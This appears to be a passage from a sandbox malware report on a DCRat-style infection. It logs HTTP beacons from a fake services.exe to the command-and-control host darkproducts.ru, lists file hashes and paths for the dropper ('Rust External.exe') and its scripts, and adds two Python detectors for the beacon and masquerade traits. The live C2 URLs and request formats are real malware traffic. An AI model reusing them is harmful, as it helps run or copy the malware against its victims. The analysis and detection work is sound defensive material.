                GET /L1nc0In.php?ufk0Q6MZwzjQ2ONT5jNy3CEntQz2j=I2GTAWRZSGu3WPocxsubD2ci&ra=H9HT0CrqJjO1CfRHE9qz9QdHIHrPai&7c28e385c99a59107b4b26dfb451942b=5da6419439ee971b58d9018e9250c63c&6473a7d14bfb18b82dc950d55c4041e7=wY4E2NxMzNwITZlRDN3EWNhZjMxADZ2ImY0QWZwUWO5MzNhBTNzcDZ&ufk0Q6MZwzjQ2ONT5jNy3CEntQz2j=I2GTAWRZSGu3WPocxsubD2ci&ra=H9HT0CrqJjO1CfRHE9qz9QdHIHrPai HTTP/1.1
                Accept: */*
                Content-Type: text/csv
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                Host: 29358cm.darkproducts.ru
                Connection: Keep-Alive
                Response
                HTTP/1.1 200 OK
                Date: Sun, 26 Jan 2025 20:09:52 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: keep-alive
                Last-Modified: Mon, 09 Dec 2024 16:26:02 GMT
                Accept-Ranges: bytes
                cf-cache-status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9IWH22Be%2FG6GSvmq0J%2FvmlXto8ddNR28uFzrkUq6PTgpnDT9K62bSpiUxi5Q22mcragcsc1XvPwDShhilltZiFh41%2FJORVdPDDSeGzKTn8JIfzzhteWPOeYtRWJYZk10Ct5DQU3EXTEIzg%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 908324a4ae4ebd7e-LHR
                alt-svc: h3=":443"; ma=86400
                server-timing: cfL4;desc="?proto=TCP&rtt=54857&min_rtt=54857&rtt_var=27428&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=598&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              • flag-us
                GET
                http://29358cm.darkproducts.ru/L1nc0In.php?ufk0Q6MZwzjQ2ONT5jNy3CEntQz2j=I2GTAWRZSGu3WPocxsubD2ci&ra=H9HT0CrqJjO1CfRHE9qz9QdHIHrPai&7c28e385c99a59107b4b26dfb451942b=5da6419439ee971b58d9018e9250c63c&6473a7d14bfb18b82dc950d55c4041e7=wY4E2NxMzNwITZlRDN3EWNhZjMxADZ2ImY0QWZwUWO5MzNhBTNzcDZ&ufk0Q6MZwzjQ2ONT5jNy3CEntQz2j=I2GTAWRZSGu3WPocxsubD2ci&ra=H9HT0CrqJjO1CfRHE9qz9QdHIHrPai
                services.exe
                Remote address:
                172.67.194.232:80
                Request
                GET /L1nc0In.php?ufk0Q6MZwzjQ2ONT5jNy3CEntQz2j=I2GTAWRZSGu3WPocxsubD2ci&ra=H9HT0CrqJjO1CfRHE9qz9QdHIHrPai&7c28e385c99a59107b4b26dfb451942b=5da6419439ee971b58d9018e9250c63c&6473a7d14bfb18b82dc950d55c4041e7=wY4E2NxMzNwITZlRDN3EWNhZjMxADZ2ImY0QWZwUWO5MzNhBTNzcDZ&ufk0Q6MZwzjQ2ONT5jNy3CEntQz2j=I2GTAWRZSGu3WPocxsubD2ci&ra=H9HT0CrqJjO1CfRHE9qz9QdHIHrPai HTTP/1.1
                Accept: */*
                Content-Type: text/csv
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                Host: 29358cm.darkproducts.ru
                Response
                HTTP/1.1 200 OK
                Date: Sun, 26 Jan 2025 20:09:52 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: keep-alive
                Last-Modified: Mon, 09 Dec 2024 16:26:02 GMT
                Accept-Ranges: bytes
                cf-cache-status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3bqe%2FBv6nS%2BKJlWBSDrB3vGFu6bfvUXDUZwJjua%2F%2BaTB4OfaXHMdkyOgEAH%2BP0fBkv6Fv20oZU%2B3L3jOFL0KiKTk1u7bxrhu6E5%2FAPVJzpjZUNtW6e5k8XHE7BQDqnMXu2Ypa56zfcoF5w%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 908324a799a0bd7e-LHR
                alt-svc: h3=":443"; ma=86400
                server-timing: cfL4;desc="?proto=TCP&rtt=55544&min_rtt=46325&rtt_var=15927&sent=14&recv=10&lost=0&retrans=0&sent_bytes=12571&recv_bytes=1172&delivery_rate=232154&cwnd=256&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              • flag-us
                GET
                http://29358cm.darkproducts.ru/L1nc0In.php?CfuKsWqrqIuAPQP=LAd2GaYLtGzs08vgkg1jr&BBSOX9gXsVWU2kptWlGjblg8=sWNZsYp8b8bj2DZpWYeVgGK11JP&7c28e385c99a59107b4b26dfb451942b=5da6419439ee971b58d9018e9250c63c&6473a7d14bfb18b82dc950d55c4041e7=wY4E2NxMzNwITZlRDN3EWNhZjMxADZ2ImY0QWZwUWO5MzNhBTNzcDZ&CfuKsWqrqIuAPQP=LAd2GaYLtGzs08vgkg1jr&BBSOX9gXsVWU2kptWlGjblg8=sWNZsYp8b8bj2DZpWYeVgGK11JP
                services.exe
                Remote address:
                172.67.194.232:80
                Request
                GET /L1nc0In.php?CfuKsWqrqIuAPQP=LAd2GaYLtGzs08vgkg1jr&BBSOX9gXsVWU2kptWlGjblg8=sWNZsYp8b8bj2DZpWYeVgGK11JP&7c28e385c99a59107b4b26dfb451942b=5da6419439ee971b58d9018e9250c63c&6473a7d14bfb18b82dc950d55c4041e7=wY4E2NxMzNwITZlRDN3EWNhZjMxADZ2ImY0QWZwUWO5MzNhBTNzcDZ&CfuKsWqrqIuAPQP=LAd2GaYLtGzs08vgkg1jr&BBSOX9gXsVWU2kptWlGjblg8=sWNZsYp8b8bj2DZpWYeVgGK11JP HTTP/1.1
                Accept: */*
                Content-Type: text/csv
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                Host: 29358cm.darkproducts.ru
                Connection: Keep-Alive
                Response
                HTTP/1.1 200 OK
                Date: Sun, 26 Jan 2025 20:10:04 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: keep-alive
                Last-Modified: Mon, 09 Dec 2024 16:26:02 GMT
                Accept-Ranges: bytes
                cf-cache-status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kvo9iQxoZ%2Bu8CzvzVCwqep2RR1nj%2FmyGFHtrSntUEPVkHDwxFCo39W6FwoDhiVNnir9Ibc2QjaCGykoAlWy9DtcebAg%2BIhGCzM7jLk4g%2BgAysqqYQ7lELHb%2Fr3yiS4rSnFsY%2Fhl3kO3QFw%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 908324eedb0d7741-LHR
                alt-svc: h3=":443"; ma=86400
                server-timing: cfL4;desc="?proto=TCP&rtt=0&min_rtt=4294967295&rtt_var=750000&sent=1&recv=3&lost=0&retrans=1&sent_bytes=0&recv_bytes=585&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              • flag-us
                GET
                http://29358cm.darkproducts.ru/L1nc0In.php?CfuKsWqrqIuAPQP=LAd2GaYLtGzs08vgkg1jr&BBSOX9gXsVWU2kptWlGjblg8=sWNZsYp8b8bj2DZpWYeVgGK11JP&7c28e385c99a59107b4b26dfb451942b=5da6419439ee971b58d9018e9250c63c&6473a7d14bfb18b82dc950d55c4041e7=wY4E2NxMzNwITZlRDN3EWNhZjMxADZ2ImY0QWZwUWO5MzNhBTNzcDZ&CfuKsWqrqIuAPQP=LAd2GaYLtGzs08vgkg1jr&BBSOX9gXsVWU2kptWlGjblg8=sWNZsYp8b8bj2DZpWYeVgGK11JP
                services.exe
                Remote address:
                172.67.194.232:80
                Request
                GET /L1nc0In.php?CfuKsWqrqIuAPQP=LAd2GaYLtGzs08vgkg1jr&BBSOX9gXsVWU2kptWlGjblg8=sWNZsYp8b8bj2DZpWYeVgGK11JP&7c28e385c99a59107b4b26dfb451942b=5da6419439ee971b58d9018e9250c63c&6473a7d14bfb18b82dc950d55c4041e7=wY4E2NxMzNwITZlRDN3EWNhZjMxADZ2ImY0QWZwUWO5MzNhBTNzcDZ&CfuKsWqrqIuAPQP=LAd2GaYLtGzs08vgkg1jr&BBSOX9gXsVWU2kptWlGjblg8=sWNZsYp8b8bj2DZpWYeVgGK11JP HTTP/1.1
                Accept: */*
                Content-Type: text/csv
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                Host: 29358cm.darkproducts.ru
                Response
                HTTP/1.1 200 OK
                Date: Sun, 26 Jan 2025 20:10:04 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: keep-alive
                Last-Modified: Mon, 09 Dec 2024 16:26:02 GMT
                Accept-Ranges: bytes
                cf-cache-status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EgrjJGFQk1v1So3uVTDb3WQ1fnF5y4l%2FQ%2BC7zDK4HCF0SNjiyqbu01qjxrsWIv2GW%2BsAdpKCDvnJuJir9ARvPS4BpATRkRv6tcdfrr1PWhFRHC2LCp4eI0%2FY9Fzxcu50PePUz3h5h9F95w%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 908324f2df797741-LHR
                alt-svc: h3=":443"; ma=86400
                server-timing: cfL4;desc="?proto=TCP&rtt=82889&min_rtt=55950&rtt_var=33542&sent=14&recv=10&lost=0&retrans=1&sent_bytes=12593&recv_bytes=1146&delivery_rate=133331&cwnd=198&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Connections summary (remote address; protocol; process; bytes sent / received; packets out / in)

• 172.67.194.232:80  http  services.exe  1.6kB sent / 26.2kB received; 16 packets out / 25 in
  http://29358cm.darkproducts.ru/L1nc0In.php?z3yg=JTirXuMZcq4xxpeNiLET0mYvy&7c28e385c99a59107b4b26dfb451942b=5da6419439ee971b58d9018e9250c63c&6473a7d14bfb18b82dc950d55c4041e7=wY4E2NxMzNwITZlRDN3EWNhZjMxADZ2ImY0QWZwUWO5MzNhBTNzcDZ&z3yg=JTirXuMZcq4xxpeNiLET0mYvy
  2 × GET (identical URL), both answered HTTP 200

• 172.67.194.232:80  http  services.exe  1.9kB sent / 26.2kB received; 16 packets out / 26 in
  http://29358cm.darkproducts.ru/L1nc0In.php?ufk0Q6MZwzjQ2ONT5jNy3CEntQz2j=I2GTAWRZSGu3WPocxsubD2ci&ra=H9HT0CrqJjO1CfRHE9qz9QdHIHrPai&7c28e385c99a59107b4b26dfb451942b=5da6419439ee971b58d9018e9250c63c&6473a7d14bfb18b82dc950d55c4041e7=wY4E2NxMzNwITZlRDN3EWNhZjMxADZ2ImY0QWZwUWO5MzNhBTNzcDZ&ufk0Q6MZwzjQ2ONT5jNy3CEntQz2j=I2GTAWRZSGu3WPocxsubD2ci&ra=H9HT0CrqJjO1CfRHE9qz9QdHIHrPai
  2 × GET (identical URL), both answered HTTP 200

• 172.67.194.232:80  http  services.exe  2.0kB sent / 26.3kB received; 18 packets out / 27 in
  http://29358cm.darkproducts.ru/L1nc0In.php?CfuKsWqrqIuAPQP=LAd2GaYLtGzs08vgkg1jr&BBSOX9gXsVWU2kptWlGjblg8=sWNZsYp8b8bj2DZpWYeVgGK11JP&7c28e385c99a59107b4b26dfb451942b=5da6419439ee971b58d9018e9250c63c&6473a7d14bfb18b82dc950d55c4041e7=wY4E2NxMzNwITZlRDN3EWNhZjMxADZ2ImY0QWZwUWO5MzNhBTNzcDZ&CfuKsWqrqIuAPQP=LAd2GaYLtGzs08vgkg1jr&BBSOX9gXsVWU2kptWlGjblg8=sWNZsYp8b8bj2DZpWYeVgGK11JP
  2 × GET (identical URL), both answered HTTP 200

• 8.8.8.8:53  dns  73 B sent / 147 B received; 1 packet out / 1 in
  DNS request: 133.211.185.52.in-addr.arpa

• 8.8.8.8:53  dns  70 B sent / 145 B received; 1 packet out / 1 in
  DNS request: 85.49.80.91.in-addr.arpa

• 8.8.8.8:53  dns  71 B sent / 157 B received; 1 packet out / 1 in
  DNS request: 72.32.126.40.in-addr.arpa

• 8.8.8.8:53  dns  69 B sent / 131 B received; 1 packet out / 1 in
  DNS request: 7.98.51.23.in-addr.arpa

• 8.8.8.8:53  dns  71 B sent / 145 B received; 1 packet out / 1 in
  DNS request: 97.17.167.52.in-addr.arpa

• 8.8.8.8:53  dns  72 B sent / 158 B received; 1 packet out / 1 in
  DNS request: 209.205.72.20.in-addr.arpa

• 8.8.8.8:53  dns  71 B sent / 157 B received; 1 packet out / 1 in
  DNS request: 197.87.175.4.in-addr.arpa

• 8.8.8.8:53  dns  71 B sent / 145 B received; 1 packet out / 1 in
  DNS request: 241.42.69.40.in-addr.arpa

• 8.8.8.8:53  dns  74 B sent / 128 B received; 1 packet out / 1 in
  DNS request: 172.210.232.199.in-addr.arpa

• 8.8.8.8:53  dns  services.exe  69 B sent / 101 B received; 1 packet out / 1 in
  DNS request: 29358cm.darkproducts.ru
  DNS response: 172.67.194.232, 104.21.12.142

• 8.8.8.8:53  dns  73 B sent / 135 B received; 1 packet out / 1 in
  DNS request: 232.194.67.172.in-addr.arpa
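The three beacons above share a recognisable shape: the same random key=value is sent at both ends of the query string, one parameter pair is 32 hex digits on both sides, a long fixed parameter is base64 written backwards (reversed and decoded it is a 40-digit hex string), every GET carries a Content-Type header although it has no body, and the User-Agent changes from request to request, one of them claiming Windows NT 6.1 on a Windows 10 host. The following Python turns those observations into checks and runs them over the recorded requests. It is an added example and not part of the Triage report: the URLs and header values are copied from the page, while the request-record layout, the benign chrome.exe record and the host Windows version are constructed assumptions.

```python
"""Heuristics for the DCRat-style HTTP beacons recorded above.

Added example, not part of the Triage report. Beacon URLs and headers are
copied from the report; the record layout, the chrome.exe control request
and the host Windows version ("10.0") are constructed assumptions.
"""
import base64
import binascii
import re
from collections import defaultdict
from typing import Optional
from urllib.parse import parse_qsl, urlsplit

HEX32 = re.compile(r"[0-9a-f]{32}")
HEX_DIGEST = re.compile(r"[0-9a-f]{32,128}")      # MD5 .. SHA-512 lengths
NT_VERSION = re.compile(r"Windows NT (\d+\.\d+)")


def decode_reversed_base64(value: str) -> Optional[str]:
    """Reverse the string, re-pad, base64-decode. Return the text only when
    it is a hex digest; random filler or binary output gives None."""
    raw = value[::-1]
    raw += "=" * (-len(raw) % 4)
    try:
        text = base64.b64decode(raw, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if HEX_DIGEST.fullmatch(text) else None


def score_request(req: dict, host_nt_version: str = "10.0") -> list[str]:
    """Return the beacon indicators present in one request record."""
    findings = []
    pairs = parse_qsl(urlsplit(req["url"]).query, keep_blank_values=True)

    # 1. Same random key=value at both ends of the query (z3yg=... above).
    counts = defaultdict(int)
    for pair in pairs:
        counts[pair] += 1
    if any(n > 1 for n in counts.values()):
        findings.append("duplicated key=value pairs")

    # 2. Key and value both 32 hex digits (7c28e385...=5da64194... above).
    if any(HEX32.fullmatch(k) and HEX32.fullmatch(v) for k, v in pairs):
        findings.append("32-hex key with 32-hex value")

    # 3. Value is backwards base64 hiding a hex digest (6473a7d1=... above).
    for key, value in pairs:
        digest = decode_reversed_base64(value)
        if digest:
            findings.append(f"reversed-base64 digest in {key[:8]}...: {digest}")

    # 4. Content-Type on a body-less GET (text/javascript, text/csv above).
    if req["method"] == "GET" and "Content-Type" in req["headers"]:
        findings.append("Content-Type header on GET without body")

    # 5. UA claims a Windows version the host does not run (NT 6.1 on Win10).
    m = NT_VERSION.search(req["headers"].get("User-Agent", ""))
    if m and m.group(1) != host_nt_version:
        findings.append(f"UA claims Windows NT {m.group(1)}, host is {host_nt_version}")
    return findings


def ua_churn(requests: list[dict]) -> dict[str, int]:
    """Distinct User-Agent strings per process. A browser presents one;
    services.exe above rotates through three within a minute."""
    uas = defaultdict(set)
    for req in requests:
        uas[req["process"]].add(req["headers"].get("User-Agent", ""))
    return {proc: len(s) for proc, s in uas.items()}


# Sample records: beacons copied from the report, chrome.exe is a constructed control.
C2 = "http://29358cm.darkproducts.ru/L1nc0In.php?"
FIXED = ("7c28e385c99a59107b4b26dfb451942b=5da6419439ee971b58d9018e9250c63c"
         "&6473a7d14bfb18b82dc950d55c4041e7=wY4E2NxMzNwITZlRDN3EWNhZjMxADZ2ImY0QWZwUWO5MzNhBTNzcDZ")
PAD1 = "z3yg=JTirXuMZcq4xxpeNiLET0mYvy"
PAD2 = "ufk0Q6MZwzjQ2ONT5jNy3CEntQz2j=I2GTAWRZSGu3WPocxsubD2ci&ra=H9HT0CrqJjO1CfRHE9qz9QdHIHrPai"
PAD3 = "CfuKsWqrqIuAPQP=LAd2GaYLtGzs08vgkg1jr&BBSOX9gXsVWU2kptWlGjblg8=sWNZsYp8b8bj2DZpWYeVgGK11JP"
UA_W7 = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"
UA_OPERA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60"
UA_W10 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"

SAMPLE_REQUESTS = [
    {"process": "services.exe", "method": "GET", "url": f"{C2}{PAD1}&{FIXED}&{PAD1}",
     "headers": {"Content-Type": "text/javascript", "User-Agent": UA_W7}},
    {"process": "services.exe", "method": "GET", "url": f"{C2}{PAD2}&{FIXED}&{PAD2}",
     "headers": {"Content-Type": "text/csv", "User-Agent": UA_OPERA}},
    {"process": "services.exe", "method": "GET", "url": f"{C2}{PAD3}&{FIXED}&{PAD3}",
     "headers": {"Content-Type": "text/csv", "User-Agent": UA_W10}},
    {"process": "chrome.exe", "method": "GET",
     "url": "https://www.example.com/search?q=triage&page=2",
     "headers": {"User-Agent": UA_W10}},
]

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(req["process"], score_request(req) or "clean")
    print("distinct UAs per process:", ua_churn(SAMPLE_REQUESTS))
```

Run stand-alone it prints five findings for the first beacon, four for the other two and "clean" for the control. The decoded 40-digit value is reported as data only; the page does not say what it identifies, and the check deliberately requires a hex digest so that the random filler values (which are not valid base64 when reversed) never match.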

              MITRE ATT&CK Enterprise v15


              Downloads

• C:\Agentcomponentdriver\PortDll.exe
  Filesize  2.7MB
  MD5       36678031ac136dc944f5b836ff267243
  SHA1      5670ecf38e35121e09bcde5c3fc834d96e290752
  SHA256    fb7730673d10c85f7496c509e0fef578f30f9ef818e62fd576907b33dc6ce025
  SHA512    08d79ea3841c60c6f1cb1d946ecd71812bd19155246f10029afa09d283c098b57e5743d6978675be15638db8a8b68828842dd49c84a970f389a30cb10c161fda

• C:\Agentcomponentdriver\cF2nsYK.vbe
  Filesize  224B
  MD5       58f14b1ab2fe69675f2092835a963260
  SHA1      3a5c88e3f551cdfb6d7053f374f475f65250a342
  SHA256    d3aba5d7c01e3f8de8969d52e11aeab5777abf679cf305a3e78bf42f42515283
  SHA512    82f3bbb05f13fd062d81862a30f203bc4ca6bcd643a85e3a393bfe5ae77e602fcb2daa0004a29c757c38cbb4c0807316c933f9e0802dba2701363e92566597da

• C:\Agentcomponentdriver\gyWUCXXRJzCMxdWE9QlvhicilMz.bat
  Filesize  149B
  MD5       61f83fd24fdcd1acc1b20155cf97dcd8
  SHA1      e21ecbd09f4c98a591f15f6e64cba7b65fd165f5
  SHA256    1725ca5841f1f224c9d9e335530e1c805fa838f873e8316db7ff8cc4ffd76120
  SHA512    8e1851ce4ab75fbd7286192026904f965f9952fbc0fa9dd3ddc3cd06f1907231d2e977c63a534de618f497d22e1e960bb9edada8c46409ef25e151da6045c6b5

• C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PortDll.exe.log
  Filesize  1KB
  MD5       655010c15ea0ca05a6e5ddcd84986b98
  SHA1      120bf7e516aeed462c07625fbfcdab5124ad05d3
  SHA256    2b1ffeab025cc7c61c50e3e2e4c9253046d9174cf00181a8c1de733a4c0daa14
  SHA512    e52c26718d7d1e979837b5ac626dde26920fe7413b8aa7be6f1be566a1b0f035582f4d313400e3ad6b92552abb1dfaf186b60b875fb955a2a94fd839fe841437

• C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\services.exe.log
  Filesize  1KB
  MD5       49b64127208271d8f797256057d0b006
  SHA1      b99bd7e2b4e9ed24de47fb3341ea67660b84cca1
  SHA256    2a5d403a2e649d8eceef8f785eeb0f6d33888ec6bbf251b3c347e34cb32b1e77
  SHA512    f7c728923c893dc9bc88ad2159e0abcda41e1b40ff7e7756e6252d135ed238a2248a2662b3392449836dd1b0b580f0c866cc33e409527484fe4602e3d3f10e3e

• C:\Users\Admin\AppData\Local\Temp\36f4394c-bc31-4c88-aa13-67d0f187b9e5.vbs
  Filesize  710B
  MD5       312919d827e3efde7feaf64211fb6889
  SHA1      459ce79fc151669455b4137a31c1e539c473d36c
  SHA256    97820fc9a2a5d2e6075d328c99856f456e9335dd31075f51f80a656e6ff6f01e
  SHA512    26b2ae91031372e84f2dd50c7edb1b4275e1c559ab30542f377529fbc4e55379b5285ac193ea3d88558f45db83a983466f06c75bbe8daa0c2bd3f12cb91bb2db

• C:\Users\Admin\AppData\Local\Temp\6bbac697-2e07-4ead-8da0-d093ab0a0e98.vbs
  Filesize  710B
  MD5       80e3856b56688aad8dc758d29ed4aeae
  SHA1      1331692eed5591f5c1ad224ce571f4e5fc88cbad
  SHA256    eef7a40069ddc9771d1c3eb480f16635f983fee01a0ba91ba2c5dc5697a974bb
  SHA512    7ae9504254491e0c166d3239f40fec935cf21528958a7f93ee6b8531a4a5c90bb01057bf9d1dd581b1acbf78d73092bed60d7b47085f868d102f368bf4b365e5

• C:\Users\Admin\AppData\Local\Temp\6dcd6085-0ac4-4210-aedb-7337dfc48147.vbs
  Filesize  486B
  MD5       7fc6c02cd3ff6d15779a47261dbc92b9
  SHA1      83bdd3760e3e166826f0cb242a04a113cb198b5c
  SHA256    9c496a40b2f5d9fd0ead2b89b05570b2cb745a3d1424e54b99c4f61134f002c0
  SHA512    c20880b6440e9448650db938d4edbbde239b63dcb8426a073ddaca4d819099a1454edf1f855db72bbc100132c42877951a5ecccabf1596ebdd3e675ce55f470d

• C:\Users\Admin\AppData\Local\Temp\6ef5a38b-c1c4-4630-8c9b-7b738a718e49.vbs
  Filesize  710B
  MD5       95592fea86bb28bec6136d950919296b
  SHA1      d93b8912380fff21906f891fcb4cdf06b30ba0d3
  SHA256    4ba52a7ecb1c34625b57635682b21407d283336b44979bdd6c221843ce0cafbc
  SHA512    cf10710bcda9dcf817c951ddcb3be7e43de6b78b584d526a1bb06a2777393438137f92fafb8b9c2f04bc21c3b39056c80f1b288ef95ea9ea1cbac0b0576e47d2

• C:\Users\Admin\AppData\Local\Temp\7zO863B5CC7\Rust External.exe
  Filesize  3.0MB
  MD5       052d8274e7bd005fabb352b5e5789cd9
  SHA1      853421783272ff3bf84999956703f56a9ef6b281
  SHA256    656a8bc85180846d696a852121d269f793861c370c1c4c82e9962916c8a5b502
  SHA512    c8d0f08dbc22e85bf292905a07ea2d67359ba25c6a601e3d5998ae39a1487df98e070dc0e6a933bf0d33dd41d18a9ae9a75834f3163ec18cf0aa147088eb922d

• C:\Users\Admin\AppData\Local\Temp\9c5aa798322712a26523b2ce90e185a52b9bb2f6.exe
  Filesize  2.7MB
  MD5       48db8cf594c31a6f0d488db47c08e60e
  SHA1      8408fb8ce20405fc5f15b8b8f5328ce99a644cff
  SHA256    d8a05689c808d3db1bed33f848060b5e7681b953810f8001fd613754172ba3c4
  SHA512    b6e6aaeae274c9e1d9635b596b4bf87afd761fcbc0d19888678ca01197c62d06935e56e0221815fa830b77d96632e2a8815c631fa765153185728b56af071259

• C:\Users\Admin\AppData\Local\Temp\KjrLCSMPDQ.bat
  Filesize  199B
  MD5       b5b6e811b247e91b5a6802a432cd74c4
  SHA1      072451fe8bb95b568f4c900b730db07ca5da82cc
  SHA256    ba6a3bfe475f67f889eb139ef040ec52d5aad20a0ddaa25dfefc3467791f83d4
  SHA512    45b2eaa3a7d07dc7a0bb28dddd9a7bfb8f84dbdf07502ee21d2e55d5136736198d81a5fdaed204a0e12d516d9ee742750880486ff9df04f340446766d3c773b4

Memory dumps (process id, dump index, address range, size)

• memory/2592-83-0x000000001D3F0000-0x000000001D402000-memory.dmp    Filesize 72KB
• memory/3300-27-0x000000001BE10000-0x000000001BE1A000-memory.dmp    Filesize 40KB
• memory/3300-39-0x000000001C630000-0x000000001C638000-memory.dmp    Filesize 32KB
• memory/3300-33-0x000000001C420000-0x000000001C42C000-memory.dmp    Filesize 48KB
• memory/3300-38-0x000000001C470000-0x000000001C47E000-memory.dmp    Filesize 56KB
• memory/3300-37-0x000000001C460000-0x000000001C468000-memory.dmp    Filesize 32KB
• memory/3300-36-0x000000001C450000-0x000000001C45E000-memory.dmp    Filesize 56KB
• memory/3300-35-0x000000001C440000-0x000000001C44A000-memory.dmp    Filesize 40KB
• memory/3300-34-0x000000001C430000-0x000000001C438000-memory.dmp    Filesize 32KB
• memory/3300-32-0x000000001BE90000-0x000000001BE98000-memory.dmp    Filesize 32KB
• memory/3300-40-0x000000001C640000-0x000000001C64A000-memory.dmp    Filesize 40KB
• memory/3300-41-0x000000001C650000-0x000000001C65C000-memory.dmp    Filesize 48KB
• memory/3300-31-0x000000001C950000-0x000000001CE78000-memory.dmp    Filesize 5.2MB
• memory/3300-30-0x000000001BE80000-0x000000001BE92000-memory.dmp    Filesize 72KB
• memory/3300-29-0x000000001BE20000-0x000000001BE2C000-memory.dmp    Filesize 48KB
• memory/3300-28-0x000000001C3B0000-0x000000001C406000-memory.dmp    Filesize 344KB
• memory/3300-25-0x000000001BDE0000-0x000000001BDE8000-memory.dmp    Filesize 32KB
• memory/3300-26-0x000000001BDF0000-0x000000001BE06000-memory.dmp    Filesize 88KB
• memory/3300-21-0x0000000000DF0000-0x00000000010A6000-memory.dmp    Filesize 2.7MB
• memory/3300-24-0x000000001BE30000-0x000000001BE80000-memory.dmp    Filesize 320KB
• memory/3300-23-0x000000001BDC0000-0x000000001BDDC000-memory.dmp    Filesize 112KB
• memory/3300-22-0x000000001BDB0000-0x000000001BDBE000-memory.dmp    Filesize 56KB
• memory/3412-110-0x000000001C3F0000-0x000000001C402000-memory.dmp   Filesize 72KB
• memory/3568-98-0x000000001BFF0000-0x000000001C002000-memory.dmp    Filesize 72KB
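Two of the dropped files above are CLR usage logs: services.exe.log and PortDll.exe.log under C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\. The .NET runtime writes one such log per managed executable a user runs, so a log named after services.exe means a .NET binary with that name ran in the Admin session; the genuine services.exe is a native image that runs as SYSTEM and never leaves this trace. The following Python turns that into a triage check. It is an added example and not part of the Triage report; the list of native system names, the benign sample paths and the CLR_v4.0_32 variant are assumptions of the example, and only the two report paths are copied from the page.

```python
"""Flag CLR usage logs whose name is that of a native Windows binary.

Added example, not part of the Triage report. The report lists
services.exe.log and PortDll.exe.log under CLR_v4.0\\UsageLogs; the two
benign paths, the name list and the live-host scanner are constructed.
"""
import os
import re
from pathlib import PureWindowsPath
from typing import Optional

# Native (unmanaged) Windows binaries whose names .NET payloads commonly borrow.
NATIVE_SYSTEM_NAMES = {
    "services.exe", "svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe",
    "smss.exe", "wininit.exe", "explorer.exe", "dllhost.exe", "conhost.exe",
    "spoolsv.exe", "taskhostw.exe", "rundll32.exe", "dwm.exe",
}
# CLR_v4.0 (64-bit) and CLR_v4.0_32 (32-bit) share the same UsageLogs layout.
USAGELOG_PATH = re.compile(r"\\CLR_v\d+\.\d+(?:_32)?\\UsageLogs\\[^\\]+\.log$", re.IGNORECASE)


def managed_exe_from_log(path: str) -> Optional[str]:
    """'...\\UsageLogs\\services.exe.log' -> 'services.exe'; None when the
    path is not a CLR usage log at all."""
    win = path.replace("/", "\\")
    if not USAGELOG_PATH.search(win):
        return None
    return PureWindowsPath(win).name[:-len(".log")]


def flag_masquerading_logs(paths) -> list[dict]:
    """Usage logs whose executable name belongs to a native system binary."""
    hits = []
    for p in paths:
        exe = managed_exe_from_log(p)
        if exe and exe.lower() in NATIVE_SYSTEM_NAMES:
            hits.append({
                "log": p,
                "executable": exe,
                "reason": (f"{exe} is native and never produces a CLR usage log; "
                           "a .NET binary of that name ran in this user's session"),
            })
    return hits


def scan_profile(local_appdata: str) -> list[dict]:
    """Live-host use: walk %LOCALAPPDATA%\\Microsoft for UsageLogs directories."""
    logs = []
    for root, _dirs, files in os.walk(os.path.join(local_appdata, "Microsoft")):
        if os.path.basename(root).lower() == "usagelogs":
            logs.extend(os.path.join(root, f) for f in files)
    return flag_masquerading_logs(logs)


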